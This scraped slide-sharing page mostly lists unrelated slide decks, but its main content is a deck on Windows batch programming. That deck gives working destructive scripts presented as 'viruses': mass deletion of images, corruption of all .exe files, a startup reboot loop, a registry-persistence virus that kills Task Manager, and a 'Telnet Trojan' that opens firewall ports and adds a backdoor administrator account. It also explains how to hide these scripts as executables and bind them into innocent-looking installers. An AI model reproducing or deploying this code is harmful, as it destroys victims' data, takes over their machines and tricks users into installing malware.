The document discusses batch file programming and various ways batch files can be used to create utilities, funny programs, and viruses that harm Windows machines. It provides examples of batch file code that can create undeleteable folders, continuously restart a system, corrupt files using for loops, and more. The document also covers basic batch file structure, operators, and ways to prevent virus attacks through batch files.
Being aware of online and malware threats is the first step to computer security. In this presentation, we help you understand:
a. Importance of computer security
b. Consequences of ignoring computer security
c. Types of threats that can harm your computer
d. Measures to take to keep your computer safe
e. How can Quick Heal help
Being aware of online and malware threats is the first step to computer security. In this presentation, we help you understand:
a. Importance of computer security
b. Consequences of ignoring computer security
c. Types of threats that can harm your computer
d. Measures to take to keep your computer safe
e. How can Quick Heal help
Ch 7: Programming for Security ProfessionalsSam Bowne
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
Basic security principles for information systems development/deployment. Information security is concerned with the confidentiality, integrity, and availability of information. From these three 'pillars', the following principles must be applied when implementing and maintaining an information system: Accountability.
This slide will cover details of evidence collection in cyber forensic which will be more useful for CSE & IT department students studying in engineering colleges.
Being aware of the trends that are expected to shape the digital landscape is an important step in ensuring the security of your data and online assets.
Amongst others, the webinar covers:
• Top Cyber Trends for 2023
• Cyber Insurance
• Prioritization of Cyber Risk
Presenters:
Colleen Lennox
Colleen Lennox is the Founder of Cyber Job Central, a newly formed job board dedicated to Cybersecurity job openings. Colleen has 25+ years in Technical Recruiting and loves to help other find their next great job!
Madhu Maganti
Madhu is a goal-oriented cybersecurity/IT advisory leader with more than 20 years of comprehensive experience leading high-performance teams with a proven track record of continuous improvement toward objectives. He is highly knowledgeable in both technical and business principles and processes.
Madhu specializes in cybersecurity risk assessments, enterprise risk management, regulatory compliance, Sarbanes-Oxley (SOX) compliance and system and organization controls (SOC) reporting.
Date: January 25, 2023
Tags: ISO, ISO/IEC 27032, Cybersecurity Management
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27032
https://pecb.com/article/cybersecurity-risk-assessment
https://pecb.com/article/a-deeper-understanding-of-cybersecurity
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/BAAl_PI9uRc
Ch 7: Programming for Security ProfessionalsSam Bowne
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
Basic security principles for information systems development/deployment. Information security is concerned with the confidentiality, integrity, and availability of information. From these three 'pillars', the following principles must be applied when implementing and maintaining an information system: Accountability.
This slide will cover details of evidence collection in cyber forensic which will be more useful for CSE & IT department students studying in engineering colleges.
Being aware of the trends that are expected to shape the digital landscape is an important step in ensuring the security of your data and online assets.
Amongst others, the webinar covers:
• Top Cyber Trends for 2023
• Cyber Insurance
• Prioritization of Cyber Risk
Presenters:
Colleen Lennox
Colleen Lennox is the Founder of Cyber Job Central, a newly formed job board dedicated to Cybersecurity job openings. Colleen has 25+ years in Technical Recruiting and loves to help other find their next great job!
Madhu Maganti
Madhu is a goal-oriented cybersecurity/IT advisory leader with more than 20 years of comprehensive experience leading high-performance teams with a proven track record of continuous improvement toward objectives. He is highly knowledgeable in both technical and business principles and processes.
Madhu specializes in cybersecurity risk assessments, enterprise risk management, regulatory compliance, Sarbanes-Oxley (SOX) compliance and system and organization controls (SOC) reporting.
Date: January 25, 2023
Tags: ISO, ISO/IEC 27032, Cybersecurity Management
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27032
https://pecb.com/article/cybersecurity-risk-assessment
https://pecb.com/article/a-deeper-understanding-of-cybersecurity
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/BAAl_PI9uRc
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxkarlhennesey
Part 4: Scripting and Virtualization (due Week 7)Objectives
1. To learn scripting on Windows and Linux
2. To add virtualization with a Linux distributionStepsPart 1—Windows Scripting
Basic Script: Scripting is useful for small programming projects or quick tasks. Often, these programs are short and meant for small problems. Unlike compiled programming languages, scripting languages are generally interpreted. Batch files or scripts are created to automate tasks and may contain several commands in one file. Scripts can be created in Notepad. These are short files that run each command in sequence at file execution. The windows command-line interface can be used to run scripts.
Below are some commands.
Echo = Displays a message in the batch file
Echo. displays a blank line
@command turns off the display of the current command
@echo off = does not echo back text
cls = clears your screen
:: = Adds comments to your code; this line will not be displayed
Start = used to start a windows application
Creating a Basic Script
cls
@echo off
::Your Name
echo "Creating a data dump file"
ipconfig /all > C:\Scripts\config_info.txt
echo end of script
Open Notepad by going to Start-> All Programs -> Accessories-> Notepad.
Type the above script into Notepad.
Create a directory named Scripts on the C:\ drive. Save this file in the C:\Scripts folder as myscript.cmd.
Do not close your Notepad file. To run, open a command prompt by typing cmd in the Search Programs and Files box when you click the Start button or search for cmd.
Change directory to the C:\Scripts folder by typing the following.
cd c:\Scripts
Then type in the following.
myscript.cmd
The script should run and will create a file.
Use the dir command to see what files are created.
Keep both the Notepad file and the command prompt open for the next step.
You can also shut down a computer from a script. This is helpful for remote shutdown in a networking situation. Add the following commands to your script and save it in Notepad. (Note: The ping command, though normally used for networking, here waits 4 seconds.)
shutdown /s /t 60 /c "Local shutdown in 1 minute!"
ping -w 1000 0.0.0.0 > nul
shutdown /a
echo "Shutdown has been aborted"
Click back to the command prompt.
Type in myscript.cmd to run the script.
You should see the script attempt to shut down, then abort the shutdown.
Keep both your Notepad and command prompt open.
Environment variables are built-in system variables available for all Windows processes describing users, paths, and so on.
Some common environment variables are as follows.
%PATH% = contains a list of directories with executable files, separated by semicolons. To add a path:
SET PATH = %PATH%;C:\Windows\Eclipse
%DATE% and %TIME% = current date and time
%RANDOM% = returns a random number between 0 and 32767
%WINDIR% = points to the windows directory C:\Windows
%PATHEXT% = displays executable file extensions ie .com, .exe, .bat, .cmd, .vbs, .vbe, ...
Command line for the beginner - Using the command line in developing for the...Jim Birch
This session will introduce the incredible potential of using the command line in developing for the web.
Interested WordPress designers and developers will gain the knowledge of using SSH to connect to servers, Git for version control, WP-CLI for interfacing with WordPress, Aliases and Bash scripts for common tasks, and automation/task runners like Grunt and Gulp.
Attendees will come away from the session with their interest piqued, with the desire to learn more about using the command line in their workflow.
Useful Linux and Unix commands handbookWave Digitech
This article provides practical examples for most frequently used commands in Linux / UNIX. Helpful for Engineers and trainee engineers, Software developers. A handy notes for all Linux & Unix commands.
Part 5 of "Introduction to Linux for Bioinformatics": Working the command lin...Joachim Jacob
This is part 5 of the training "introduction to linux for bioinformatics". Here we introduce more advanced use on the command line (piping, redirecting) and provide you a selection of GNU text mining and analysis tools that assist you tremendously in handling your bioinformatics data. Interested in following this training session? Contact me at http://www.jakonix.be/contact.html
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
In questo evento online gratuito, organizzato dalla Community Italiana di UiPath, potrai esplorare le nuove funzionalità di Autopilot, il tool che integra l'Intelligenza Artificiale nei processi di sviluppo e utilizzo delle Automazioni.
📕 Vedremo insieme alcuni esempi dell'utilizzo di Autopilot in diversi tool della Suite UiPath:
Autopilot per Studio Web
Autopilot per Studio
Autopilot per Apps
Clipboard AI
GenAI applicata alla Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
2. Introduction.
Batch processing Explain.
(In MS-Windows)
Batch processing means when there are some
unique processes or tasks executes one after
another in form of a group, bunch, or batch.
Here, in windows batch file means the bunch of
DOS(Disk Operating System) Commands.
By effective batch file programming many
utilities, funny items or viruses that harm the
windows machines can prepared.
For good Batch file programmer deep knowledge
Commands in new lines of DOS commands is must.
3. Introduction.
For making any batch file steps are.
Open Notepad.
Type DOS commands separately in new line.
Saved it by .bat extension.
To execute Double Click on that file which
looks like .
This is default icon
of Batch files in
Windows OS.
4. Structure
Example – running dos command.
Start-Run-cmd
Then cmd windows open looks like
Now type any ms dos commands.
You can control entire Operation System
through DOS commands.
For more commands type help and press enter.
5. Structure
Working of File
When we Click any batch file then
-Firstly it opens the file read first line command
run in command prompt.
-Then closes the file.
-Again open the file and run second file then
close it.
-Again open - run – close this process is continue
till the commands ends and exit.
Note: All commands must be in new Line.
6. Operators.
Operators – as Accelerators
With batch files, which are also called batch Programs or scripts, you can
simplify routine or repetitive tasks
-Call -Setlocal
-Echo -Endlocal
-For -If
-Rem
-Goto
-Shift
-Endlocal
7. Syntax
Syntax (mostly used)
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
echo [{on|off}] [message]
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
rem [comment]
goto label
8. Fun
Undeletable Folder with Your Name.
This code will create a folder on desktop and in root of all drives of your
computer which is not simply deletable.
--------------------------------------------------------------------------------------
:y
md C:"Documents and Settings""All Users"Desktopyogendra
md c:yogendra
md d:yogendra
md e:yogendra
md f:yogendra
md g:yogendra
md h:yogendra
goto y
---------------------------------------------------------------------------------------
Copy this code in note pad and save it by anyname.bat
9. Important:
Here, all of you a Question or doubt in mind.
Is this true?
You think that if the black window of command prompt will continuously
stays on desktop or on taskbar any on can suspect on it and if, somebody
closes it then our batch file execution is stopped.
Solution of this is the Batch to Exe convertor software which converts batch
file into exe . Then the file runs in background and uncatchable.
Bat2exe:
you can download this from url: http://www.brothersoft.com/d.php?
soft_id=50301&url=http%3A%2F%2Fwww.f2ko.de%2Fdownloads
%2FBat_To_Exe_Converter.zip
10. Snapshot – Bat to Exe
Source path (.bat file)
Output path (.exe file)
Check invisible application
Finally compile the file
11. Fun
Can’t do anything
By this code we create a file that ends the explorer.exe and all things are
gone.
Code:
----------------------------------------------------------------------------------------
Taskkill /im explorer.exe /f
----------------------------------------------------------------------------------------
12. Fun
Many Folders
this code creates 1000’s of folders with number naming.
Code:
----------------------------------------------------------------------
:e
Md %random%
Goto e
----------------------------------------------------------------------
13. Fun
Rotating Clock hands
this code rotates clocks hands continuously.
Code:
---------------------------------------------------------------------------------------------
:y
time = 12:05:12
time = 12:10:12
time = 12:15:12
time = 12:20:12
time = 12:25:12
time = 12:30:12
time = 12:35:12
time = 12:40:12
time = 12:45:12
time = 12:50:12
time = 12:55:12
goto y
-----------------------------------------------------------------------------------------------------------------------------------
14. Utilities
With funny things we can also make some
utilities for windows machine.
Utilities which helps us to maintain our system
like speed, performance, hardisk mantainence.
By batch file we can make schedule task.
15. Utilities
Disk defragmenter file.
This file is used to defragment your hard disk. Copy this file into location.
“C:Documents and SettingsAll UsersStart MenuProgramsStartup”
code:
------------------------------------------------------------------------------------------
Defrag c: -f
Defrag d: -f
Defrag e: -f
Defrag f: -f
Msg * Defragment is completed
---------------------------------------------------------------------------------------------
16. Utilities
Steganography code:
Code:
-----------------------------------------------------------------------
Copy /b %1 + /b %2 new.jpg
exit
-----------------------------------------------------------------------------------------
Save this code by hide.bat
Hiding process
1. Copy this hide.bat in a folder.
2. Now copy a jpge file and a text file which we wants to hide behind jpeg in that
folder.
3. Now runs this hide .bat through dos prompt by providing names of jpeg file and
text file in order (.jpeg <space> .txt ) and runs it.A new.jpeg is created with text
hidden in it.
4. To get your text open this jpeg in notepad and find your text in last of the
notepad.
18. Virus Attacks
System restart virus.
This batch file code is restarts system when it starts
Code:
---------------------------------------------------------------------------------------------
echo shutdown –r –f –t 00 > shut.bat
move shut.bat C:"Documents and Settings""All Users""Start Menu"ProgramsStartup
----------------------------------------------------------------------------------------------
Copy the above code and paste in notepad by name anything.bat and runs on any
Pc then after next restart the system will never starts and automatically restarts.
19. Virus Attacks
For loop viruses 1
For loop is a looping operator which creates loop for any command
This code creates messages on desktop showing files are corrupted.
----------------------------------------------------------------------------------------------
Code:
For /r c: %%y in (*.*) do msg * %%y ------ is Corrupted.
it not actually corrupts the file it shows only messages
----------------------------------------------------------------------------------------------
Note: conversion into exe is required.
20. Virus Attacks
For loop viruses 2 (Damage level :High)
For loop is a looping operator which creates loop for any command
4. This code will remove all images, wallpapers from your system
Warning! -- Try it on your own risk.
Code:
for /r c: %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r d: %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r e: %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r f: %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
Note: conversion into exe is required.
21. Virus Attacks
For loop viruses 3 (Damage level :High)
For loop is a looping operator which creates loop for any command
3. This code will corrupt all exe files of your system.
Warning! -- Try it on your own risk.
Code:
echo 00967jyj875kkj6704ekfkf9iddkc224543453000 > c:tempero.null
for /r c: %%y in (*.exe) do copy /b %%y + c:tempero.null %%y
for /r d: %%y in (*.exe) do copy /b %%y + c:tempero.null %%y
for /r e: %%y in (*.exe) do copy /b %%y + c:tempero.null %%y
for /r f: %%y in (*.exe) do copy /b %%y + c:tempero.null %%y
del c:tempero.null /s/q
Note: conversion into exe is required.
22. Virus Attacks
For loop viruses 4 (Damage level :High)
For loop is a looping operator which creates loop for any command
3. This code will corrupt all exe files of your system.
Warning! -- Try it on your own risk.
Code:
echo you lost all !!!! >c:tempero.null
for /r c: %%y in (*.exe) do copy c:temporal.null + %%y %%y
for /r d: %%y in (*.exe) do copy c:temporal.null + %%y %%y
for /r e: %%y in (*.exe) do copy c:temporal.null + %%y %%y
for /r f: %%y in (*.exe) do copy c:temporal.null + %%y %%y
del c:tempero.null /s/q
Note: conversion into exe is required.
23. My Friend Virus (Dangerous level : High)
@echo off
rename mypic.exe igfx.exe
if exist c:windowssystem32igfx.exe goto code
if exist d:windowssystem32igfx.exe goto code
if exist e:windowssystem32igfx.exe goto code
if exist f:windowssystem32igfx.exe goto code
if exist g:windowssystem32igfx.exe goto code
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>>yog.reg
if exist c:windowsnul echo "yhlsagent"="c:windowssystem32igfx.exe">>yog.reg
if exist d:windowsnul echo "yhlsagent"="d:windowssystem32igfx.exe">>yog.reg
if exist e:windowsnul echo "yhlsagent"="e:windowssystem32igfx.exe">>yog.reg
if exist f:windowsnul echo "yhlsagent"="f:windowssystem32igfx.exe">>yog.reg
if exist g:windowsnul echo "yhlsagent"="g:windowssystem32igfx.exe">>yog.reg
echo "avast!"="C:PROGRA~1Disp.exe">>yog.reg
echo "avgnt"="C:PROGRA~1avg.exe">>yog.reg
echo "USB Antivirus"="C:Program FilesGuard.exe">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]>>yog.reg
echo "LegalNoticeCaption"="Say Happy Birthday to me">>yog.reg
echo "LegalNoticeText"="I want that you wish to me on my birthday. I am very alone person, I have no any friend, do u want to become my friend, please accept me as ur friend, all the best my
friend for ur all works in future, I want to ask u a question would u be alone as me, so plz develop ur interest in making friends like me. !!!!!!!!!!!">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
if exist c:windowsnul copy igfx.exe c:windowssystem32
if exist d:windowsnul copy igfx.exe d:windowssystem32
if exist e:windowsnul copy igfx.exe e:windowssystem32
if exist f:windowsnul copy igfx.exe f:windowssystem32
if exist g:windowsnul copy igfx.exe g:windowssystem32
:code
shutdown -r -f -t 600
:e
if exist c:windowsnul md C:Docume~1Admini~1Desktop"I always with u my friend"
if exist d:windowsnul md d:Docume~1Admini~1Desktop"I always with u my friend"
if exist e:windowsnul md e:Docume~1Admini~1Desktop"I always with u my friend"
if exist f:windowsnul md f:Docume~1Admini~1Desktop"I always with u my friend"
if exist g:windowsnul md g:Docume~1Admini~1Desktop"I always with u my friend"
taskkill /im USBGuard.exe /f
taskkill /im notepad.exe /f
taskkill /im SOUNDMAN.exe /f
taskkill /im taskmgr.exe /f
date 02-12-3060
goto e conversion into exe is required
24. Telnet Trojen.
Work as Remote Administrator tool with the use of
telenet.
@echo off
sc config tlntsvr start= auto
net start tlntsvr
netsh firewall add portopening TCP 23 "Telnet"
sc config termservice start= auto
net start termservice
netsh firewall add portopening TCP 3389 "Remote Desktop"
net user Default 12345 /add
net localgroup administrators Default /add
By Sourabh Mishra.
25. Finishing Virus Coding
Firstly copy all these coding into the notepad and name them anything
with .bat extention.
Now converts this .bat file into .exe file with the help of Bat to Exe converter.
This is the software which
Helps us to hide the cmd
coding and runs the process
in background.
File.bat File.exe
26. Finishing Virus Coding
After converting .bat file into .exe file What to do Next?
All of u thinking that these are the .exe files how these are spreads. Your
answer is the software which reside in directory c:windowssystem32
with name iexpress to start iexpress Start > Run > iexpress
You will see this windows this is your mixing software.
27. Finishing Virus Coding
Follows the instruction of software then after pressing some next you will
find this window.
Here, add your viral code and the innocent software(exe) in which u want to
bind this.
28. Finishing Virus Coding
After that in two selection windows firstly select the innocent software(exe)
location then in second
Window select your viral
code(exe).
Follows the instruction and your
New software setup is created
Which is innocent but contains
Harmful virus.
When we install this software , then
After installation of software the
Added virus code is runs.
30. Prevention (Conclusion)
Some possible prevention or conclusions are
1.Do not accept any file with .bat or .exe extension on the internet while
chatting or from your mailbox.
2.Do not take softwares from untrusted vendors.
3.Always check your autoruns by—
start>run>msconfig>startup
if u find something suspected target its path and remove it after checking
it.
4.These are the batch viruses which are not so advanced viruses but having
very dangerous capabilities, and only strong updated antivirus can catch
them so always kept updated antivirus.